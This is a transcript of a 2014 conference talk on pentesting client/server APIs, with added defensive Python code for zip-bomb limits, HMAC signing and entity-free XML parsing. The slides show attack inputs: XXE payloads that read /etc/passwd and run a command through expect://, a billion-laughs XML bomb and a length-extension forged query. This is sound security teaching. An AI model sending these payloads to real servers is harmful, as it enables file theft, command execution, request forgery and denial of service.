CodeFest 2014 - Pentesting client/server API
http://2014.codefest.ru/lecture/696
Presentation Transcript

  • Slide 1: Pentesting client/server API. Sergey Belov
  • Slide 2: $ whoami (© 2002—2014, Digital Security)
      • Senior Security Auditor at Digital Security
      • BugHunter: Google, Yandex, Badoo, Yahoo +++
      • Writer: habrahabr, Xakep magazine
      • CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013
      • Speaker: CodeFest 2012, ZeroNights 0x03
      • Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
  • Slides 3-4: What are we talking about? API (image slides, no further text)
  • Slides 5-6: Hacking via API (image slides, no text)
  • Slide 7: From interface to API methods
  • Slides 8-11: (image slides, no text)
  • Slide 12: What should we test?
      • Logic!
      • Bypassing restrictions (sqli/xss)
      • Parameter tampering
    Developing:
      • Stop hacks and custom implementation in API! Really
  • Slide 13: (image slide, no text)
  • Slide 14: ZIP
  • Slides 15-19: 42 Kb… …10 Gb? …100 Gb? …100 Tb? …4.5 Pb! http://www.unforgettable.dk/
  • Slide 20: Say HELLO to ZIP BOMB!
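What the server side of an upload endpoint should do before inflating an archive, as an added example that is not from the talk: check the sizes declared in the archive and their ratio, then count the bytes that actually leave the decompressor, and refuse nested archives (the 42 Kb file on the slides is zips inside zips). The limit values are assumptions.

```python
import io
import zipfile

# Assumed limits for this example; tune them to what the API really needs to accept.
MAX_MEMBER_BYTES = 50 * 1024 * 1024   # largest single file we will inflate
MAX_TOTAL_BYTES = 200 * 1024 * 1024   # largest total output per archive
MAX_RATIO = 100                       # inflated:compressed above this is suspicious

class ZipBombSuspected(Exception):
    pass

def safe_read_zip(data: bytes) -> dict:
    """Return {member name: bytes}, or raise before a bomb can exhaust disk or memory."""
    out, total = {}, 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # Check 1: sizes declared in the central directory (cheap, but headers can lie).
            if info.file_size > MAX_MEMBER_BYTES or total + info.file_size > MAX_TOTAL_BYTES:
                raise ZipBombSuspected(f"{info.filename}: declared {info.file_size} bytes")
            if info.file_size > MAX_RATIO * max(info.compress_size, 1):
                raise ZipBombSuspected(f"{info.filename}: suspicious compression ratio")
            # Check 2: stream the member and count what really leaves the decompressor.
            chunks = []
            with zf.open(info) as fh:
                while chunk := fh.read(64 * 1024):
                    if not chunks and chunk.startswith(b"PK\x03\x04"):
                        raise ZipBombSuspected(f"{info.filename}: nested archive")  # never recurse
                    total += len(chunk)
                    if total > MAX_TOTAL_BYTES:
                        raise ZipBombSuspected("decompressed output exceeds total limit")
                    chunks.append(chunk)
            out[info.filename] = b"".join(chunks)
    return out

def verdict(data: bytes) -> str:
    try:
        safe_read_zip(data)
        return "accepted"
    except ZipBombSuspected as e:
        return f"rejected: {e}"

def build_archive(members: dict) -> bytes:
    """Constructed test input: pack {name: bytes} into an in-memory DEFLATE zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()
```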
  • Slide 21: The evil of JavaScript and (rest of the title is not in the transcript)
  • Slides 22-23: (image slides, no text)
  • Slide 24: http://habrahabr.ru/post/186160/
  • Slide 25: Crypto
  • Slide 26: Query signing: Sign = sha*(…+DATA+…), APIkey
  • Slide 27: (image slide, no text)
  • Slide 28: But why?
  • Slide 29: Say hello again. To length extension attack
  • Slide 30: A=1&B=2&C=3, token 07ce36c769ae130708258fb5dfa3d37ca5a67514, TOKEN=sha1(KEY+DATA)
  • Slide 31: Some have hijacked just 1 request…
  • Slide 32: What does the attacker know?
      • Original data
      • Sign (token)
  • Slide 33: What does the attacker want? Change some data / change params
  • Slide 34: A=1&B=2&C=3\x80\x00\x00…\x02&C=4
  • Slide 35: Can sign new query without API key! Vkontakte: sig = md5(name1=value1name2=value2api_secret). Mail.RU: sig = md5(uid + params + private_key). http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
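The signing scheme from slide 30 beside its hardened replacement, with a verifier that refuses the query shape from slide 34 before hashing anything. This is an added example, not the talk's code or any vendor's; API_KEY is a constructed stand-in for the unknown KEY.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl

API_KEY = b"constructed-demo-secret"   # stand-in; the slides' real KEY is not known

def sign_vulnerable(key: bytes, data: bytes) -> str:
    """The scheme on slide 30: sha1(KEY + DATA). SHA-1 and MD5 are Merkle-Damgard
    hashes: the digest IS the internal state after absorbing KEY+DATA+padding, so
    whoever holds DATA and this token can resume hashing from that state and sign
    DATA+padding+extra without ever learning KEY (slides 34-35)."""
    return hashlib.sha1(key + data).hexdigest()

def sign_hmac(key: bytes, data: bytes) -> str:
    """Hardened replacement: HMAC. The key is mixed in before and after the inner
    hash, so the token exposes no resumable state and extension no longer works."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()

def verify_request(key: bytes, query: bytes, token: str) -> dict:
    """Server-side check: refuse the shape an extended query takes before hashing
    anything, then compare the HMAC in constant time. Returns the parsed params."""
    # The glue between original and appended data is hash padding: 0x80, zero bytes
    # and a length block. None of that is legal in a query string.
    if any(b < 0x20 or b > 0x7E for b in query):
        raise ValueError("non-printable bytes in signed data")
    params = parse_qsl(query.decode("ascii"), keep_blank_values=True, strict_parsing=True)
    names = [k for k, _ in params]
    # The appended "&C=4" repeats a name that is already signed; which copy wins is
    # parser-dependent, so refuse duplicates outright.
    if len(names) != len(set(names)):
        raise ValueError("duplicate parameter names")
    if not hmac.compare_digest(sign_hmac(key, query), token):
        raise ValueError("bad signature")
    return dict(params)

def is_accepted(key: bytes, query: bytes, token: str) -> bool:
    try:
        verify_request(key, query, token)
        return True
    except ValueError:
        return False
```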
  • Slide 36: Request hijacking… How?
  • Slides 37-44: (image slides, no text)
  • Slide 45: XML? XML entities!
  • Slide 46: DTD example: <!ENTITY writer "Donald Duck."> <!ENTITY copyright "Copyright W3Schools."> XML example: <author>&writer;&copyright;</author>
  • Slide 47: XML entities? External Entity!
  • Slide 48: <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>
  • Slide 49: <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" >]> <foo>&xxe;</foo>
  • Slide 50: XML Bombs!
  • Slide 51:
    <?xml version="1.0"?>
    <!DOCTYPE lolz [
      <!ENTITY lol "lol">
      <!ELEMENT lolz (#PCDATA)>
      <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
      <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
      <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
      <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
      <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
      <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
      <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
      <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
      <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
    ]>
    <lolz>&lol9;</lolz>
  • Slide 52: What are we talking about? Man in the Middle
  • Slide 53: Examples?
  • Slide 54: 2013-11-19 by Reginaldo Silva
  • Slide 55: https://www.facebook.com/BugBounty/posts/778897822124446 http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
  • Slide 56: Testing:
      • https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
      • XXE to RCE https://gist.github.com/joernchen/3623896
    Development:
      • Disable entities
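One way to implement "disable entities" for the documents on slides 48, 49 and 51, using Python's bundled expat bindings; this is an added example, not the talk's code, and the flat {field: text} document shape it extracts is an assumption.

```python
import xml.parsers.expat as expat

class UnsafeXML(ValueError):
    pass

def parse_untrusted_xml(data: bytes) -> dict:
    """Parse a flat <root><field>text</field>...</root> document from an API client.
    Any DOCTYPE or entity declaration aborts the parse before a single entity is
    expanded, which covers both the external entity (slides 48-49) and the
    exponential-expansion bomb (slide 51). Returns {field: text}."""
    fields, stack = {}, []
    p = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE {name!r} is not accepted")

    def on_entity_decl(*_):
        raise UnsafeXML("entity declarations are not accepted")

    def on_start(tag, attrs):
        stack.append((tag, []))

    def on_text(text):
        if stack:
            stack[-1][1].append(text)

    def on_end(tag):
        tag, parts = stack.pop()
        text = "".join(parts).strip()
        if text:
            fields[tag] = text

    p.StartDoctypeDeclHandler = on_doctype     # fires at "<!DOCTYPE ... [", before the DTD body
    p.EntityDeclHandler = on_entity_decl       # belt and braces for the internal subset
    p.StartElementHandler = on_start
    p.CharacterDataHandler = on_text
    p.EndElementHandler = on_end
    try:
        p.Parse(data, True)
    except expat.ExpatError as e:
        raise UnsafeXML(f"malformed XML: {e}") from None
    return fields

def verdict(data: bytes) -> str:
    try:
        return "accepted: " + ",".join(sorted(parse_untrusted_xml(data)))
    except UnsafeXML as e:
        return f"rejected: {e}"
```

The defusedxml package packages the same refusal policy for the standard-library parsers; the point here is that the refusal must fire in the DOCTYPE handler, before any expansion or fetch has happened.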
  • Slide 57: Finally:
      • Re-test all interface restrictions;
      • Specific compressions;
      • JS callbacks;
      • Crypto + SSL test + hardcoded credentials (hackapp.com);
      • XML - XXE;
      • Anything else :]
  • Slide 58: Thanks for your attention! Questions? twitter.com/sergeybelove, sbelov@dsec.ru. Digital Security in Moscow: (495) 223-07-86. Digital Security in Saint Petersburg: (812) 703-15-47